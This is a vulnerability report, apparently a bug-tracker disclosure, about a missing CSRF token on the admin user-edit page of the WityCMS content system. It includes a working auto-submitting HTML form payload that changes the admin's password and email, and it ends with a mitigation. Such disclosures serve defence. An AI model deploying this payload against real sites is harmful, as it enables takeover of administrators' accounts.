Description
Hello,
I came across and tried to find bug on this CMS. I see that user edit page is vulnerable to CSRF attack because there is no CSRF token to validate user's request. it means that if an admin user visits crafted url made by attacker (via XSS or Phishing), a POST request will be generated and be submitted to wity/admin/user/edit/1 that will change admin user information included password and email address.
once exploited, attacker can fully take over admin's account.
Affect url: http://192.168.56.200/wity/admin/user/edit/1
Steps to reproduce:
-
Check POST request when user edit information on /wity/admin/user/edit/1

-
Build CSRF POC based on POST request from user/edit and store it in attacker’s site
<iframe id="test" name="test" style="display:none">
</iframe>
<form action="http://192.168.56.200/wity/admin/user/edit/1" method="post" id="the_form" style="display:none" target="test">
<input type="hidden" name="id" value="1" />
<input type="hidden" name="nickname" value="admin" />
<input type="hidden" name="password" value="csrf123" />
<input type="hidden" name="password_conf" value="csrf123" />
<input type="hidden" name="email" value="csrf@test.com" />
<input type="hidden" name="groupe" value="0" />
<input type="hidden" name="type" value="all" />
<input type="submit" value="Change Password" />
</form>
<script type="text/javascript">
//<![CDATA[
var $form = document.getElementById ('the_form');
$form.submit ();
//]]>
</script>
</div>
-
Let user access CSRF POC in attacker’s site and then POST request will be generated and requested to http://192.168.56.200/wity/admin/user/edit/1
Visiting attacker site:

POST request generated:

-
After that, user’s information will be changed to value attacker put on CSRF POC
Mitigation:
Original password is needed in order to change new password of user
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet